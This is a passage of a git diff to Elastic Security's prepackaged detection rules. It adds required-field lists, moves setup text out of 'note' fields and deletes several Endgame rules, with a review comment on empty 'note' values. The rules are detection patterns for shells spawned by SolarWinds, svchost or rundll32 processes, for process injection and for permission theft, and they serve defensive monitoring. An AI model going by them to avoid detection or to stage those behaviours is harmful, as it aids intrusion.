 "name": "Malware - Detected - Elastic Endgame",
 "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:file_classification_event or endgame.event_subtype_full:file_classification_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 99,
 "rule_id": "0a97b20f-4144-49ea-be32-b540ecc445de",
 "severity": "critical",
@@ -21,5 +48,5 @@
 "Elastic Endgame"
 ],
 "type": "query",
- "version": 7
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_prevented.json
index b26a0ab2eedb7..03794ebcc170c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_prevented.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_prevented.json
@@ -13,6 +13,33 @@
 "max_signals": 10000,
 "name": "Malware - Prevented - Elastic Endgame",
 "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:file_classification_event or endgame.event_subtype_full:file_classification_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "3b382770-efbb-44f4-beed-f5e0a051b895",
 "severity": "high",
@@ -21,5 +48,5 @@
 "Elastic Endgame"
 ],
 "type": "query",
- "version": 7
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_detected.json
deleted file mode 100644
index 3ecfb461d2c49..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_detected.json
+++ /dev/null
@@ -1,25 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Elastic Endgame detected Permission Theft. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
- "from": "now-15m",
- "index": [
- "endgame-*"
- ],
- "interval": "10m",
- "language": "kuery",
- "license": "Elastic License v2",
- "max_signals": 10000,
- "name": "Permission Theft - Detected - Elastic Endgame",
- "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:token_protection_event or endgame.event_subtype_full:token_protection_event)\n",
- "risk_score": 73,
- "rule_id": "c3167e1b-f73c-41be-b60b-87f4df707fe3",
- "severity": "high",
- "tags": [
- "Elastic",
- "Elastic Endgame"
- ],
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_prevented.json
deleted file mode 100644
index 7f1853af6910c..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_prevented.json
+++ /dev/null
@@ -1,25 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Elastic Endgame prevented Permission Theft. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
- "from": "now-15m",
- "index": [
- "endgame-*"
- ],
- "interval": "10m",
- "language": "kuery",
- "license": "Elastic License v2",
- "max_signals": 10000,
- "name": "Permission Theft - Prevented - Elastic Endgame",
- "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:token_protection_event or endgame.event_subtype_full:token_protection_event)\n",
- "risk_score": 47,
- "rule_id": "453f659e-0429-40b1-bfdb-b6957286e04b",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Elastic Endgame"
- ],
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_detected.json
deleted file mode 100644
index 8018ba8027bb7..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_detected.json
+++ /dev/null
@@ -1,25 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Elastic Endgame detected Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
- "from": "now-15m",
- "index": [
- "endgame-*"
- ],
- "interval": "10m",
- "language": "kuery",
- "license": "Elastic License v2",
- "max_signals": 10000,
- "name": "Process Injection - Detected - Elastic Endgame",
- "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:kernel_shellcode_event or endgame.event_subtype_full:kernel_shellcode_event)\n",
- "risk_score": 73,
- "rule_id": "80c52164-c82a-402c-9964-852533d58be1",
- "severity": "high",
- "tags": [
- "Elastic",
- "Elastic Endgame"
- ],
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_prevented.json
deleted file mode 100644
index c8fa9f26e7c71..0000000000000
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_prevented.json
+++ /dev/null
@@ -1,25 +0,0 @@
-{
- "author": [
- "Elastic"
- ],
- "description": "Elastic Endgame prevented Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
- "from": "now-15m",
- "index": [
- "endgame-*"
- ],
- "interval": "10m",
- "language": "kuery",
- "license": "Elastic License v2",
- "max_signals": 10000,
- "name": "Process Injection - Prevented - Elastic Endgame",
- "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:kernel_shellcode_event or endgame.event_subtype_full:kernel_shellcode_event)\n",
- "risk_score": 47,
- "rule_id": "990838aa-a953-4f3e-b3cb-6ddf7584de9e",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Elastic Endgame"
- ],
- "type": "query",
- "version": 7
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_detected.json
index 94534cf3a82c0..f890db4197f6e 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_detected.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_detected.json
@@ -13,6 +13,33 @@
 "max_signals": 10000,
 "name": "Ransomware - Detected - Elastic Endgame",
 "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:ransomware_event or endgame.event_subtype_full:ransomware_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 99,
 "rule_id": "8cb4f625-7743-4dfb-ae1b-ad92be9df7bd",
 "severity": "critical",
@@ -21,5 +48,5 @@
 "Elastic Endgame"
 ],
 "type": "query",
- "version": 8
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_prevented.json
index 3f493d89a0ff7..4a2c08c917ea0 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_prevented.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_prevented.json
@@ -13,6 +13,33 @@
 "max_signals": 10000,
 "name": "Ransomware - Prevented - Elastic Endgame",
 "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:ransomware_event or endgame.event_subtype_full:ransomware_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "e3c5d5cb-41d5-4206-805c-f30561eae3ac",
 "severity": "high",
@@ -21,5 +48,5 @@
 "Elastic Endgame"
 ],
 "type": "query",
- "version": 8
+ "version": 9
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_abnormal_process_id_file_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_abnormal_process_id_file_created.json
index b974250b93bc0..265b72866273b 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_abnormal_process_id_file_created.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_abnormal_process_id_file_created.json
@@ -20,6 +20,33 @@
 "https://twitter.com/GossiTheDog/status/1522964028284411907",
 "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.id",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 43,
 "rule_id": "cac91072-d165-11ec-a764-f661ea17fbce",
 "severity": "medium",
@@ -50,5 +77,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 1
+ "version": 2
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_child_cmd_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_child_cmd_powershell.json
index 418885c9d63f9..4e711ac5f49b5 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_child_cmd_powershell.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_child_cmd_powershell.json
@@ -15,14 +15,32 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Command Execution via SolarWinds Process",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and process.name: (\"cmd.exe\", \"powershell.exe\") and\nprocess.parent.name: (\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\",\n \"SolarwindsDiagnostics*.exe\"\n )\n",
 "references": [
 "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
 "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20FILEWRITES%20(METHODOLOGY).ioc"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -72,5 +90,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
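Review bot: The `note` field is replaced with the empty string (`+ "note": "",`) rather than dropped once its text moves to `setup`, so the rule now ships an investigation guide that is present but blank; consumers that test for the key's presence rather than its content will show an empty guide section. If the intent is "no guide", omitting the key — as the newly added execution_endgame_exploit_*.json files do — states that unambiguously, subject to what the prebuilt-rule schema requires for `note`. The same `"note": ""` pattern appears in execution_apt_solarwinds_backdoor_unusual_child_processes.json, execution_com_object_xwizard.json, execution_command_shell_started_by_unusual_process.json, execution_command_shell_via_rundll32.json and execution_command_virtual_machine.json; only execution_command_shell_started_by_svchost.json fills `note` with a real triage guide. The enclosing JSON object starts and ends outside this hunk.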
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_unusual_child_processes.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_unusual_child_processes.json
index 0cd9d99630b47..596d9322fd8f8 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_unusual_child_processes.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_unusual_child_processes.json
@@ -15,14 +15,32 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious SolarWinds Child Process",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name: (\"SolarWinds.BusinessLayerHost.exe\", \"SolarWinds.BusinessLayerHostx64.exe\") and\n not process.name : (\n \"APMServiceControl*.exe\",\n \"ExportToPDFCmd*.Exe\",\n \"SolarWinds.Credentials.Orion.WebApi*.exe\",\n \"SolarWinds.Orion.Topology.Calculator*.exe\",\n \"Database-Maint.exe\",\n \"SolarWinds.Orion.ApiPoller.Service.exe\",\n \"WerFault.exe\",\n \"WerMgr.exe\")\n",
 "references": [
 "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
 "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20CHILD%20PROCESSES%20(METHODOLOGY).ioc"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -72,5 +90,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_com_object_xwizard.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_com_object_xwizard.json
index 15a2ef5d93a6e..20da6669c4f1a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_com_object_xwizard.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_com_object_xwizard.json
@@ -12,14 +12,37 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Execution of COM object via Xwizard",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and\n process.pe.original_file_name : \"xwizard.exe\" and\n (\n (process.args : \"RunWizard\" and process.args : \"{*}\") or\n (process.executable != null and\n not process.executable : (\"C:\\\\Windows\\\\SysWOW64\\\\xwizard.exe\", \"C:\\\\Windows\\\\System32\\\\xwizard.exe\")\n )\n )\n",
 "references": [
 "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/",
 "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -54,5 +77,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_prompt_connecting_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_prompt_connecting_to_the_internet.json
index e5bef64a4c747..2db5758e008f8 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_prompt_connecting_to_the_internet.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_prompt_connecting_to_the_internet.json
@@ -19,6 +19,28 @@
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "89f9a4b0-9f8f-4ee0-8823-c4751a6d6696",
 "severity": "low",
@@ -62,5 +84,5 @@
 }
 ],
 "type": "eql",
- "version": 7
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_svchost.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_svchost.json
index 08e3c55610148..682247570fa31 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_svchost.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_svchost.json
@@ -12,10 +12,41 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Svchost spawning Cmd",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and \n not (process.pe.original_file_name : \"cmd.exe\" and process.args : (\n \"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\"))\n",
+ "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows\nNT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be\nused by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual\nbehavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege\nescalation.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
+ "query": "process where event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and\n not (process.pe.original_file_name : \"cmd.exe\" and process.args : (\n \"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\"))\n",
+ "references": [
+ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747"
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -45,5 +76,5 @@
 "timeline_title": "Comprehensive Process Timeline",
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 12
+ "version": 14
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_unusual_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_unusual_process.json
index 27ec0d952beaf..9da4b07502618 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_unusual_process.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_unusual_process.json
@@ -12,10 +12,28 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Unusual Parent Process for cmd.exe",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"cmd.exe\" and\n process.parent.name : (\"lsass.exe\",\n \"csrss.exe\",\n \"epad.exe\",\n \"regsvr32.exe\",\n \"dllhost.exe\",\n \"LogonUI.exe\",\n \"wermgr.exe\",\n \"spoolsv.exe\",\n \"jucheck.exe\",\n \"jusched.exe\",\n \"ctfmon.exe\",\n \"taskhostw.exe\",\n \"GoogleUpdate.exe\",\n \"sppsvc.exe\",\n \"sihost.exe\",\n \"slui.exe\",\n \"SIHClient.exe\",\n \"SearchIndexer.exe\",\n \"SearchProtocolHost.exe\",\n \"FlashPlayerUpdateService.exe\",\n \"WerFault.exe\",\n \"WUDFHost.exe\",\n \"unsecapp.exe\",\n \"wlanext.exe\" )\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -43,5 +61,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_via_rundll32.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_via_rundll32.json
index 5e5cdd317828a..d3dfebd6d8d5b 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_via_rundll32.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_via_rundll32.json
@@ -15,10 +15,38 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Command Shell Activity Started via RunDLL32",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type == \"start\" and\n process.name : (\"cmd.exe\", \"powershell.exe\") and\n process.parent.name : \"rundll32.exe\" and process.parent.command_line != null and\n /* common FPs can be added here */\n not process.parent.args : (\"C:\\\\Windows\\\\System32\\\\SHELL32.dll,RunAsNewUser_RunDLL\",\n \"C:\\\\WINDOWS\\\\*.tmp,zzzzInvokeManagedCustomActionOutOfProc\")\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.command_line",
+ "type": "wildcard"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093",
